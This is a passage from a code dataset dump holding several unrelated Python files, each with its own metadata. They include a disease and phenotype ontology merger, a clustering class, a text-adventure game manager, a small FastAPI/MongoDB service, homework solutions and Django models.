src.util import Text\nimport os\nfrom datetime import datetime as dt\nfrom functools import reduce\nfrom ast import literal_eval\nfrom collections import defaultdict\n\n#def write_dicts(dicts,fname):\n#    with open(fname,'w') as outf:\n#        for k in dicts:\n#            
outf.write(f'{k}\\t{dicts[k]}\\n')\n\ndef read_bad_hp_mappings():\n fn = os.path.join(os.path.dirname(os.path.abspath(__file__)),'input_data','hpo_errors.txt')\n drops = defaultdict(set)\n with open(fn,'r') as infile:\n for line in infile:\n if line.startswith('-'):\n continue\n x = line.strip().split('\\t')\n hps = x[0]\n commaindex = hps.index(',')\n curie = hps[1:commaindex]\n name = hps[commaindex+1:-1]\n badset = literal_eval(x[1])\n drops[curie].update(badset)\n return drops\n\ndef filter_umls(umls_pairs,sets_with_umls):\n # We've got a bunch of umls pairs, but we really only want to use them if they're not\n # already BOTH attached to a hp or mondo.\n #for s in sets_with_umls:\n # if 'UMLS:C2931082' in s:\n # print(s)\n # if 'MESH:C536004' in s:\n # print(s)\n with open('filtered.txt','w') as ff:\n used = set()\n for s in sets_with_umls:\n used.update(s)\n #if 'UMLS:C2931082' in used:\n # print('umls in used')\n #if 'MESH:C536004' in used:\n # print('mesh in used')\n ok_pairs = []\n for pair in umls_pairs:\n p=list(pair)\n # print(p[0])\n # print(p[1])\n ok = ((p[0] not in used) or (p[1] not in used))\n if ok:\n ok_pairs.append(pair)\n else:\n ff.write(f'{p[0]}\\t{p[1]}\\n')\n return ok_pairs\n\ndef combine_id_sets(l1,l2):\n \"\"\"Given lists of sets, combine them, overlapping sets that are exactly the same\"\"\"\n #print(l1[0])\n #print(type(l1[0]))\n #print(l2[0])\n #print(type(l2[0]))\n s = set( [frozenset(x) for x in l1])\n s2 = set( [frozenset(x) for x in l2])\n s.update(s2)\n return [ set(x) for x in s ]\n\ndef read_badxrefs(pref):\n morebad = defaultdict(list)\n fn = os.path.join(os.path.dirname(os.path.abspath(__file__)),'input_data',f'{pref}_badxrefs.txt')\n with open(fn,'r') as inf:\n for line in inf:\n if line.startswith('#'):\n continue\n x = line.strip().split(' ')\n morebad[x[0]].append(x[1])\n return morebad\n\ndef load_diseases_and_phenotypes():\n print('disease/phenotype')\n print('get and write hp sets')\n bad_mappings = read_bad_hp_mappings()\n more_bad_mappings = read_badxrefs('hpo')\n for h,m in more_bad_mappings.items():\n bad_mappings[h].update(m)\n hpo_sets,labels = build_sets('HP:0000118', ignore_list = ['ICD','NCIT'], bad_mappings = bad_mappings)\n print('filter')\n hpo_sets = filter_out_non_unique_ids(hpo_sets)\n print('ok')\n dump_sets(hpo_sets,'hpo_sets.txt')\n print('get and write mondo sets')\n #MONDO has disease, and its sister disease susceptibility. I'm putting both in disease. Biolink q\n #But! this is a problem right now because there are some things that go in both, and they are getting filtered out\n bad_mondo_mappings = read_badxrefs('mondo')\n mondo_sets_1,labels_1 = build_exact_sets('MONDO:0000001',bad_mondo_mappings)\n mondo_sets_2,labels_2 = build_exact_sets('MONDO:0042489',bad_mondo_mappings)\n mondo_close = get_close_matches('MONDO:0000001')\n mondo_close2 = get_close_matches('MONDO:0042489')\n for k,v in mondo_close2.items():\n mondo_close[k] = v\n dump_sets(mondo_sets_1,'mondo1.txt')\n dump_sets(mondo_sets_2,'mondo2.txt')\n labels.update(labels_1)\n labels.update(labels_2)\n #if we just add these together, then any mondo in both lists will get filtered out in the next step.\n #so we need to put them into a set. 
You can't put sets directly into a set, you have to freeze them first\n mondo_sets = combine_id_sets(mondo_sets_1,mondo_sets_2)\n mondo_sets = filter_out_non_unique_ids(mondo_sets)\n dump_sets(mondo_sets,'mondo_sets.txt')\n print('get and write umls sets')\n bad_umls = read_badxrefs('umls')\n meddra_umls = read_meddra(bad_umls)\n meddra_umls = filter_umls(meddra_umls,mondo_sets+hpo_sets)\n dump_sets(meddra_umls,'meddra_umls_sets.txt')\n dicts = {}\n #EFO has 3 parts that we want here:\n # Disease\n efo_sets_1,l = build_exact_sets('EFO:0000408')\n labels.update(l)\n #phenotype\n efo_sets_2,l = build_exact_sets('EFO:0000651')\n labels.update(l)\n #measurement\n efo_sets_3,l = build_exact_sets('EFO:0001444')\n labels.update(l)\n efo_sets_a = combine_id_sets(efo_sets_1,efo_sets_2)\n efo_sets = combine_id_sets(efo_sets_a, efo_sets_3)\n efo_sets = filter_out_non_unique_ids(efo_sets)\n dump_sets(efo_sets,'efo_sets.txt')\n print('put it all together')\n print('mondo')\n glom(dicts,mondo_sets,unique_prefixes=['MONDO'])\n dump_dicts(dicts,'mondo_dicts.txt')\n print('hpo')\n glom(dicts,hpo_sets,unique_prefixes=['MONDO'],pref='HP')\n dump_dicts(dicts,'mondo_hpo_dicts.txt')\n print('umls')\n glom(dicts,meddra_umls,unique_prefixes=['MONDO'],pref='UMLS',close={'MONDO':mondo_close})\n dump_dicts(dicts,'mondo_hpo_meddra_dicts.txt')\n print('efo')\n glom(dicts,efo_sets,unique_prefixes=['MONDO'],pref='EFO')\n dump_dicts(dicts,'mondo_hpo_meddra_efo_dicts.txt')\n print('dump it')\n diseases,phenotypes = create_typed_sets(set([frozenset(x) for x in dicts.values()]))\n write_compendium(diseases,'disease.txt','disease',labels)\n write_compendium(phenotypes,'phenotypes.txt','phenotypic_feature',labels)\n\n\ndef create_typed_sets(eqsets):\n \"\"\"Given a set of sets of equivalent identifiers, we want to type each one into\n being either a disease or a phenotypic feature. 
Or something else, that we may want to\n chuck out here.\n Current rules: If it has a mondo, it's a disease, no matter what else it is\n If it doesn't have a mondo, but it does have an HP, then it's a phenotype\n Otherwise, consult the UMLS to see what it might be\n \"\"\"\n umls_types = read_umls_types()\n diseases = set()\n phenotypic_features = set()\n unknown_types = set()\n for equivalent_ids in eqsets:\n #prefixes = set([ Text.get_curie(x) for x in equivalent_ids])\n prefixes = get_prefixes(equivalent_ids)\n if 'MONDO' in prefixes:\n diseases.add(equivalent_ids)\n elif 'HP' in prefixes:\n phenotypic_features.add(equivalent_ids)\n elif 'UMLS' in prefixes:\n umls_ids = [ Text.un_curie(x) for x in equivalent_ids if Text.get_curie(x) == 'UMLS']\n #if len(umls_ids) > 1:\n # print(umls_ids)\n try:\n semtype = umls_types[umls_ids[0]]\n if semtype in ['Disease or Syndrome','Neoplastic Process','Injury or Poisoning',\n 'Mental or Behavioral Dysfunction','Congenital Abnormality',\n 'Anatomical Abnormality']:\n diseases.add(equivalent_ids)\n elif semtype in ['Finding', 'Pathologic Function', 'Sign or Symptom', 'Acquired Abnormality']:\n phenotypic_features.add(equivalent_ids)\n else:\n #Therapeutic or Preventive Procedure, Laboratory Procedure,Laboratory or Test Result\n #Diagnostic Procedure\n if semtype not in unknown_types:\n #print('What is this UMLS type?')\n #print(semtype,umls_ids[0])\n unknown_types.add(semtype)\n pass\n except Exception as e:\n #print(f'Missing UMLS: {umls_ids[0]}')\n #print(equivalent_ids)\n #Calling it a phenotype\n phenotypic_features.add(equivalent_ids)\n elif 'EFO' in prefixes:\n phenotypic_features.add(equivalent_ids)\n #else:\n # print(prefixes)\n return diseases, phenotypic_features\n\ndef build_exact_sets(iri,bad_mappings = defaultdict(set)):\n prefix = Text.get_curie(iri)\n uber = UberGraph()\n uberres = uber.get_subclasses_and_exacts(iri)\n results = []\n labels = {}\n for k,v in uberres.items():\n #Don't hop ontologies here.\n subclass_prefix = Text.get_curie(k[0])\n if subclass_prefix != prefix:\n continue\n if k[1] is not None and k[1].startswith('obsolete'):\n continue\n dbx = set([ norm(x) for x in v ])\n for bm in bad_mappings[k[0]]:\n if bm in dbx:\n dbx.remove(bm)\n dbx.add(k[0])\n labels[k[0]] = k[1]\n results.append(dbx)\n return results,labels\n\ndef get_close_matches(iri):\n prefix = Text.get_curie(iri)\n uber = UberGraph()\n uberres = uber.get_subclasses_and_close(iri)\n close = {}\n for k,v in uberres.items():\n #Don't hop ontologies here.\n subclass_prefix = Text.get_curie(k[0])\n if subclass_prefix != prefix:\n continue\n if k[1] is not None and k[1].startswith('obsolete'):\n continue\n dbx = set([ norm(x) for x in v ])\n close[k[0]] = dbx\n return close\n\n\ndef norm(curie):\n curie = f'{Text.get_curie(curie).upper()}:{Text.un_curie(curie)}'\n if Text.get_curie(curie) == 'MSH':\n return Text.recurie(curie,'MESH')\n if Text.get_curie(curie) in ['SNOMEDCT_US','SCTID']:\n return Text.recurie(curie,'SNOMEDCT')\n return curie\n\ndef build_sets(iri, ignore_list = ['ICD'], bad_mappings = {}):\n \"\"\"Given an IRI create a list of sets. 
Each set is a set of equivalent LabeledIDs, and there\n    is a set for each subclass of the input iri\"\"\"\n    uber = UberGraph()\n    uberres = uber.get_subclasses_and_xrefs(iri)\n    results = []\n    labels = {}\n    for k,v in uberres.items():\n        if k[1] is not None and k[1].startswith('obsolete'):\n            continue\n        dbx = set([ norm(x) for x in v if not Text.get_curie(x) in ignore_list ])\n        labels[k[0]] = k[1]\n        head = k[0]\n        dbx.add(head)\n        bad_guys = bad_mappings.get(head, set())  # works even when bad_mappings is a plain dict\n        dbx.difference_update(bad_guys)\n        results.append(dbx)\n    return results,labels\n\n\n#THIS is bad.\n# We can't distribute MRCONSO.RRF, and dragging it out of UMLS is a manual process.\n# It's possible we could rebuild using the services, but no doubt very slowly\ndef read_meddra(bad_maps):\n    pairs = set()\n    mrcon = os.path.join(os.path.dirname(__file__),'input_data', 'MRCONSO.RRF')\n    nothandled = set()\n    with open(mrcon,'r') as inf:\n        for line in inf:\n            x = line.strip().split('|')\n            if x[1] != 'ENG':\n                continue\n            if x[2] == 'S':\n                continue\n            #There is a suppress column. Only go forward if it is 'N' (it can be 'O', 'E', 'Y', all mean suppress)\n            if x[16] != 'N':\n                continue\n            oid = x[10]\n            if oid == '':\n                oid = x[9]\n            source = x[11]\n            if source == 'HPO':\n                otherid = oid\n            elif source == 'MDR':\n                otherid = f'MEDDRA:{oid}'\n            elif source == 'NCI':\n                otherid = f'NCIT:{oid}'\n            elif source == 'SNOMEDCT_US':\n                otherid = f'SNOMEDCT:{oid}'\n            elif source == 'MSH':\n                otherid = f'MESH:{oid}'\n            elif source in ['LNC','SRC']:\n                continue\n            else:\n                if source not in nothandled:\n                    #print('not handling source:',source)\n                    nothandled.add(source)\n                continue\n            uid = f'UMLS:{x[0]}'\n            if uid in bad_maps and otherid == bad_maps[uid]:\n                continue\n            pairs.add( frozenset({uid,otherid}) )\n    return list(pairs)\n\ndef read_umls_types():\n    types = {}\n    mrsty = os.path.join(os.path.dirname(__file__),'input_data','MRSTY.RRF')\n    with open(mrsty,'r') as inf:\n        for line in inf:\n            x = line.split('|')\n            types[x[0]] = x[3]\n    return types\n\nif __name__ == '__main__':\n    load_diseases_and_phenotypes()\n","sub_path":"babel/disease_phenotype.py","file_name":"disease_phenotype.py","file_ext":"py","file_size_in_byte":12440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"46985922","text":"from pprint import pprint\nword = \"it a string a string string\"\ndef histogram_dict(word):\n    word = word.split()\n    count = {}\n    for i in word:\n        if i in count:\n            count[i] += 1\n        else:\n            count[i] = 1\n    return count\n\ndef histogram_list(str):\n    dict = histogram_dict(str)\n    output = []\n    for i in dict:\n        output.append([i, dict[i]])\n    return output\n\ndef histogram_tuple(str):\n    dict = histogram_dict(str)\n    return dict.items()\n\ndef histogram_count(str):\n    dict = histogram_dict(str)\n    output = {}\n    for i in dict:\n        if dict[i] in output:\n            output[dict[i]].append(i)\n        else:\n            output[dict[i]] = [i]\n    output = output.items()\n    return output\n\ndef unique_words(hist):\n    return len(hist.values())\n\nif __name__ == '__main__':\n    val = histogram_list(word)\n    # val2 = unique_words(val)\n    print(val)\n    # print(val2)","sub_path":"Code/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"506861948","text":"import inspect\n\n\nclass Items(dict):\n\n    # Static Lookups\n    UNKNOWN = 0\n    POKE_BALL = 1\n    GREAT_BALL = 2\n    ULTRA_BALL = 3\n    MASTER_BALL = 4\n    POTION = 101\n    SUPER_POTION = 102\n    HYPER_POTION = 103\n    MAX_POTION = 104\n    REVIVE = 201\n    MAX_REVIVE = 
202\n LUCKY_EGG = 301\n INCENSE_ORDINARY = 401\n INCENSE_SPICY = 402\n INCENSE_COOL = 403\n INCENSE_FLORAL = 404\n TROY_DISK = 501\n X_ATTACK = 602\n X_DEFENSE = 603\n X_MIRACLE = 604\n RAZZ_BERRY = 701\n BLUK_BERRY = 702\n NANAB_BERRY = 703\n WEPAR_BERRY = 704\n PINAP_BERRY = 705\n SPECIAL_CAMERA = 801\n INCUBATOR_BASIC_UNLIMITED = 901\n INCUBATOR_BASIC = 902\n POKEMON_STORAGE_UPGRADE = 1001\n ITEM_STORAGE_UPGRADE = 1002\n\n def __init__(self):\n super(dict, self).__init__(self)\n attributes = inspect.getmembers(Items, lambda attr :not(inspect.isroutine(attr)))\n for attr in attributes:\n if attr[0].isupper():\n self[attr[1]] = attr[0]\n","sub_path":"pogo/itemdex.py","file_name":"itemdex.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"29967332","text":"from sklearn.cluster import MeanShift, DBSCAN\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.base import BaseEstimator, ClusterMixin\nfrom sklearn.utils.validation import NotFittedError\n\n\nclass DBShift(BaseEstimator, ClusterMixin):\n \"\"\"Perform DBShift clustering on a vector array.\n\n DBShift is useful for splitting a feature space into regions for\n systematic exploration. Fitting occurs in two stages:\n 1. DBSCAN is performed over the input to identify \"main\n clusters\" and outliers.\n 2. Mean Shift clustering is performed over the DBSCAN\n outliers, to break these up into regions. These \"outlier\n clusters\" are labelled with negative integers.\n\n Prediction is done by kNN against the dataset used in fitting.\n\n Parameters\n ----------\n eps : float\n The `eps` parameter for DBSCAN. If None, `eps` is chosen to\n be the mean of the ranges of the input data dimensions,\n divided by 33.\n\n min_samples : int\n The `min_samples` parameter for DBSCAN. If None,\n `min_samples` is taken to be 1% of the input data.\n\n n_neighbors : int\n The `n_neighbors` (k) parameter for kNN. 
If None,\n        `n_neighbors` is taken to be the same as `min_samples`.\n\n    Attributes\n    ----------\n    labels_ : The cluster labels identified during fitting\n    components_ : The vector array input used in fitting\n\n    _dbscan : The internal DBSCAN classifier\n    _meanshift : The internal Mean Shift classifier\n    _knn : The internal KNN classifier\n    \"\"\"\n    def __init__(self, eps=None, min_samples=None, n_neighbors=None):\n        self.eps = eps\n        self.min_samples = min_samples\n        self.n_neighbors = n_neighbors\n\n        self._dbscan = None\n        self._meanshift = None\n        self._knn = None\n\n        self.labels_ = None\n        self.components_ = None\n\n    def fit(self, X, y=None):\n        \"\"\"Perform clustering.\n\n        Parameters\n        -----------\n        X : array-like, shape=[n_samples, n_features]\n            Samples to cluster.\n\n        y : Ignored\n\n        \"\"\"\n        # DBSCAN parameters\n        if self.eps is not None:\n            eps = self.eps\n        else:\n            eps = (X.max(axis=0) - X.min(axis=0)).mean() / 33\n\n        if self.min_samples is not None:\n            m = self.min_samples\n        else:\n            m = max(1, X.shape[0] // 100)  # 1% of the data, but never 0\n\n        # Do dbscan\n        self._dbscan = DBSCAN(eps=eps, min_samples=m)\n        labels = self._dbscan.fit_predict(X)\n\n        # Do mean shift if there are outliers (default parameters)\n        outliers = X[labels == -1]\n        self._meanshift = MeanShift()\n\n        if outliers.shape[0]:\n            outlier_clusters = self._meanshift.fit_predict(outliers)\n            labels[labels == -1] = -1 - outlier_clusters\n\n        # Fit KNN\n        if self.n_neighbors is not None:\n            k = self.n_neighbors\n        else:\n            k = self._dbscan.min_samples\n\n        self._knn = KNeighborsClassifier(n_neighbors=k).fit(X, labels)\n\n        # save output\n        self.components_ = X\n        self.labels_ = labels\n\n        return self\n\n    def predict(self, X):\n        \"\"\"Predict the cluster labels for the provided data using KNN\n\n        Parameters\n        ----------\n        X : array-like, shape (n_query, n_features)\n            Test samples.\n\n        Returns\n        -------\n        y : array of shape [n_samples] or [n_samples, n_outputs]\n            Cluster labels for each data sample.\n        \"\"\"\n        if self._knn is None:\n            raise NotFittedError\n\n        return self._knn.predict(X)\n\n
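    # Typical usage (sketch): model = DBShift().fit(X); model.predict(X_new)\n    # then routes new points to the fitted regions via kNN. Non-negative\n    # labels are DBSCAN's main clusters; negative labels are the Mean Shift\n    # \"outlier clusters\" from stage two.\n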
Classes are\n ordered by lexicographic order.\n \"\"\"\n if self._knn is None:\n raise NotFittedError\n\n return self._knn.predict_proba(X)\n","sub_path":"olac/clusterers.py","file_name":"clusterers.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"227823678","text":"import jieba\nimport wordcloud\nfrom scipy.misc import imread\n\nmk = imread('../../Downloads/timg.jpg')\nf = open('CIIE.txt', 'r')\ntxt = f.read()\nw = wordcloud.WordCloud(width=600, height=600, background_color='white', scale=3,\n font_path='/System/Library/Fonts/Hiragino Sans GB.ttc',\n mask=mk, max_words=1000)\nw.generate(' '.join(jieba.lcut(txt)))\nw.to_file('CIIE.png')\n","sub_path":"CIIE-wordcloud.py","file_name":"CIIE-wordcloud.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"494662692","text":"\nfrom player import Player\nfrom room import Room\nfrom items import Item\nfrom errors import IllegalMoveError, NotEnoughItemsError, IllegalCountError\n\n\ndef create_rooms():\n\t# Declare all the rooms\n\n\troom = {\n\t\t'outside': Room(\n\t\t\t\"Outside Cave Entrance\",\n\t\t\t\"North of you, the cave mount beckons\"\n\t\t),\n\t\t'foyer': Room(\n\t\t\t\"Foyer\",\n\t\t\t\"Dim light filters in from the south. Dusty passages run north and east.\"\n\t\t),\n\t\t'overlook': Room(\n\t\t\t\"Grand Overlook\",\n\t\t\t\"A steep cliff appears before you, falling into the darkness. Ahead to the north, a light flickers in the distance, but there is no way across the chasm.\"\n\t\t),\n\t\t'narrow': Room(\n\t\t\t\"Narrow Passage\",\n\t\t\t\"The narrow passage bends here from west to north. The smell of gold permeates the air.\"\n\t\t),\n\t\t'treasure': Room(\n\t\t\t\"Treasure Chamber\",\n\t\t\t\"You've found the long-lost treasure chamber! Sadly, it has already been completely emptied by earlier adventurers. The only exit is to the south.\"\n\t\t),\n\t}\n\n\t# Link rooms together\n\n\troom['outside'].connect_to(room['foyer'], 'n')\n\troom['foyer'].connect_to(room['overlook'], 'n')\n\troom['foyer'].connect_to(room['narrow'], 'e')\n\troom['narrow'].connect_to(room['treasure'], 'n')\n\n\troom['foyer'].add_items(\n\t\titem=Item('rock', 'A fist-sized rock. Could be used as a weapon in a pinch.'),\n\t\tcount=3,\n\t)\n\troom['outside'].add_items(\n\t\titem=Item('stick', 'A fairly thin branch. 
Not much use on its own.'),\n\t\tcount=8,\n\t)\n\troom['treasure'].add_items(\n\t\titem=Item('coin', 'The scattered remnants of a once-vast hoard.'),\n\t\tcount=41,\n\t)\n\n\treturn room\n\n\nclass AdventureManager:\n\tdirections = ['n', 's', 'e', 'w']\n\n\tdef __init__(self):\n\t\tself.rooms = create_rooms()\n\t\tself.player = Player(self.rooms['outside'])\n\t\tself.describe_current_room()\n\n\tdef print(self, text: str) -> None:\n\t\t'''\n\t\tPrints something to the screen.\n\t\t\tLater, this might be modified to allow for fancier effects.\n\n\t\tArgs:\n\t\t\ttext (str): text to print\n\t\t'''\n\n\t\tprint(text[0].upper() + text[1:])\n\n\tdef step(self) -> None:\n\t\t'''\n\t\tDoes a step of the game world.\n\t\t'''\n\t\tpass\n\n\tdef get_current_room_summary(self):\n\t\treturn f'You are currently in the {self.player.current_room.name}.'\n\n\tdef get_current_room_description(self):\n\t\treturn self.player.current_room.description\n\n\tdef get_current_room_contents(self):\n\t\treturn self.player.current_room.print_items()\n\n\tdef describe_current_room(self):\n\t\tself.print(self.get_current_room_summary())\n\t\tself.print(self.get_current_room_description())\n\t\tif len(self.player.current_room.items):\n\t\t\tself.print(self.get_current_room_contents())\n\n\tdef examine_item(self, item_name):\n\t\ttry:\n\t\t\titem = self.player.get_item_by_name(item_name)\n\t\t\tself.print(item.description)\n\t\texcept KeyError:\n\t\t\ttry:\n\t\t\t\titem = self.player.current_room.get_item_by_name(item_name)\n\t\t\t\tself.print(item.description)\n\t\t\texcept KeyError:\n\t\t\t\tself.print(f'There\\'s no {item_name} around here.')\n\n\tdef move_player(self, direction: str, direction_name: str = None) -> None:\n\t\t'''\n\t\tMoves the player.\n\n\t\tArgs:\n\t\t\tdirection (str): Direction to move.\n\t\t\tdirection_name (str, optional): The name of the direction you moved.\n\t\t'''\n\n\t\tif direction_name is None:\n\t\t\tdirection_name = direction\n\n\t\ttry:\n\t\t\tself.player.move(direction)\n\n\t\t\tself.print(f'You move {direction_name}...')\n\t\t\tself.describe_current_room()\n\n\t\t\tself.step()\n\n\t\texcept IllegalMoveError:\n\t\t\tself.print(f'You can\\'t move {direction_name}.')\n\n\tdef player_take(self, item_name, count):\n\t\ttry:\n\t\t\titem = self.player.current_room.get_item_by_name(item_name)\n\t\t\tself.player.transfer_items_from(self.player.current_room, item, count=count)\n\t\t\tself.print(f'Picked up {count} of {item_name}.')\n\t\texcept KeyError:\n\t\t\tself.print(f'There\\'s not a {item_name} here!')\n\t\texcept NotEnoughItemsError:\n\t\t\tself.print(f'There aren\\'t enough of {item_name} here to take {count}.')\n\t\texcept IllegalCountError:\n\t\t\tself.print(f'Can\\'t take {count} of an item!')\n\n\tdef player_drop(self, item_name, count):\n\t\ttry:\n\t\t\titem = self.player.get_item_by_name(item_name)\n\t\t\tself.player.transfer_items_to(self.player.current_room, item, count=count)\n\t\t\tself.print(f'Dropped {count} of {item_name}.')\n\t\texcept KeyError:\n\t\t\tself.print(f'You don\\'t have a {item_name}!')\n\t\texcept NotEnoughItemsError:\n\t\t\tself.print(f'You don\\'t have enough of {item_name} to drop {count}.')\n\t\texcept IllegalCountError:\n\t\t\tself.print(f'Can\\'t drop {count} of an item!')\n\n\tdef print_player_inventory(self):\n\t\tself.print(self.player.print_inventory())\n\n\tdef print_player_inventory_count(self, item_name):\n\t\tself.print(f'You are currently holding 
{self.player.get_item_count_by_name(item_name)}')\n","sub_path":"src/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"326294640","text":"string = input(\"Enter the input: \")\nstring = string.split()\n\ndef add(values):\n    total = 0\n    for i in values:\n        if i.isdigit():\n            total = total + int(i)\n    return total\n\nprint(add(string))\n","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299989162","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom mongo.db import DB\n\napp = FastAPI()\n\norigins = [\n    \"http://localhost.tiangolo.com\",\n    \"https://localhost.tiangolo.com\",\n    \"http://localhost\",\n    \"http://localhost:8080\",\n    \"https://burakhanaksoy.azurewebsites.net\",\n    \"http://burakhanaksoy.azurewebsites.net\"\n]\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\ndb_instance = DB()\ndb = db_instance.get_db('my-db')\n\n\n@app.get(\"/skills\")\nasync def get_skills():\n    pipeline = []\n    pipeline.append({'$project': {'_id': 0}})\n    collection = db.get_collection('skills')\n\n    skills = []\n    async for record in collection.aggregate(pipeline):\n        skills.append(record)\n\n    return skills\n\n\n@app.get(\"/articles\")\nasync def get_articles():\n    pipeline = []\n    pipeline.append({'$project': {'_id': 0}})\n    collection = db.get_collection('articles')\n\n    articles = []\n    async for record in collection.aggregate(pipeline):\n        articles.append(record)\n\n    return articles\n\n\n@app.get('/demo')\nasync def demo():\n    return 'hi'\n","sub_path":"docker/back/backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"236862190","text":"\"\"\"Sample solutions from various students\"\"\"\n\n# Exercise 1\n\ndef vowelcount (s):\n    # function vowelcount takes a string as an argument and returns the number of vowels in the string.\n\n    s = s.lower()\n    vowels = s.count('a') + s.count('o') + s.count('e') + s.count('u') + s.count('i')\n\n    return vowels\n\n\ndef vowelcount(str):\n    \"\"\"Count number of vowels in a string\"\"\"\n    vowels = 'aeiouAEIOU'\n    count = 0\n    for i in str:\n        if i in vowels:\n            count += 1\n    return count\n\n# Martin's solution:\ndef vowelcount(s):\n    \"\"\"Count vowels in s\"\"\"\n    s = s.lower()\n    nv = 0\n    for v in 'aeiou':\n        nv += s.count(v)\n    return nv\n\n
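# e.g. every version above returns 3 for vowelcount('Hello World')\n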
\n# Exercise 2\n\ndef metric(x, y):\n    \"\"\"Calculate the difference and sum of two numbers x and y and the quotient\n    of the difference and sum\"\"\"\n\n    d = x - y\n    s = x + y\n\n    if s == 0:\n        print('the sum is 0 and you cannot divide by 0! Ever tried to divide cake by 0 people?')\n        return None\n    q = d / s\n    return q\n\n\n# Martin's solution:\ndef metric(x, y):\n    \"\"\"Calculate difference over sum\"\"\"\n    d = x - y\n    s = x + y\n    print('difference is %g, sum is %g' % (d, s))\n    if s == 0:\n        return 0\n    return d / s\n\n\n\n# Exercise 3\n\ndef multtable(n):\n    \"Print the multiplication table of the integers 1 to n\"\n\n    for x in range(1,n+1):\n        for y in range(1,n+1):\n            result=x*y\n\n            if y<n:\n                print(str(result) + ' ', end='')\n            else:\n                print(result,end='\\n')\n\n\n# Martin's solution:\n\ndef multtable(n):\n    \"\"\"Print multiplication table from 1 to n\"\"\"\n    for i in range(1, n+1):\n        for j in range(1, n+1):\n            print(i * j, end=' ')\n        print()\n","sub_path":"homework1/homework1_samples.py","file_name":"homework1_samples.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75607019","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('common', '0001_initial'),\n        ('products', '0001_initial'),\n        ('purchasing', '0001_initial'),\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Shipment',\n            fields=[\n                ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n                ('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now)),\n                ('modified_on', models.DateTimeField(auto_now=True, default=django.utils.timezone.now)),\n                ('comments', models.ManyToManyField(blank=True, to='common.Comment')),\n                ('images', models.ManyToManyField(blank=True, to='common.Image')),\n                ('purchase_order', models.ForeignKey(to='purchasing.PurchaseOrder')),\n                ('received_by', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n            ],\n            options={\n                'abstract': False,\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='ShipmentLineItem',\n            fields=[\n                ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n                ('created_on', models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now)),\n                ('modified_on', models.DateTimeField(auto_now=True, default=django.utils.timezone.now)),\n                ('quantity', models.IntegerField()),\n                ('shipment', models.ForeignKey(to='receiving.Shipment')),\n                ('sku', models.ForeignKey(to='products.Sku')),\n            ],\n            options={\n                'abstract': False,\n            },\n            bases=(models.Model,),\n        ),\n    ]\n","sub_path":"apps/receiving/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"90630761","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom profiles.models import SellerProfile, ClientProfile\nfrom django.utils.text import slugify\nfrom django.db.models.signals import post_delete, pre_save\nfrom django.dispatch import receiver\nfrom django.conf import settings\nimport numpy as np\nimport math\nfrom django.core.validators import MaxValueValidator, MinValueValidator, MinLengthValidator, MaxLengthValidator\n# from django.db import models\n# Create your models here.\n\n\n
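# upload_location is presumably wired up as an ImageField/FileField\n# upload_to callback: uploads land under blog/<author_id>/<title>-<filename>.\n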
def upload_location(instance, filename, **kwargs):\n    file_path = 'blog/{author_id}/{title}-{filename}'.format(\n        author_id=str(instance.author.id), title=str(instance.title), filename=filename\n    )\n    return file_path\n\n\nclass Categories(models.Model):\n    title = models.CharField(max_length=150, unique=True)\n\n    def __str__(self):\n        return self.title\n\n\nclass Product(models.Model):\n    UNITS = (\n        ('K', ('Kilogram')),\n        ('G', ('Gram')),\n        ('L', ('Liter')),\n    )\n    STOCK_STATUS = (\n        ('IN-STOCK', ('IN-STOCK')),\n        ('OUT OF STOCK', ('OUT OF STOCK')),\n    )\n    DELIVERY_DAYS = (\n        (1, '1'),\n        (2, '2'),\n        (3, '3'),\n        (4, '4'),\n        (5, '5'),\n        (6, '6'),\n        (7, '7'),\n        (8, '8'),\n        (9, '9'),\n        (10, '10'),\n        (11, '11'),\n        (12, '12'),\n        (13, '13'),\n        (14, '14'),\n        (15, '15'),\n    )\n    MAX_DELIVERY_DAYS = (\n        (1, '1'),\n        (2, '2'),\n        (3, '3'),\n        (4, '4'),\n        (5, '5'),\n        (6, '6'),\n        (7, '7'),\n        (8, '8'),\n        (9, '9'),\n        (10, 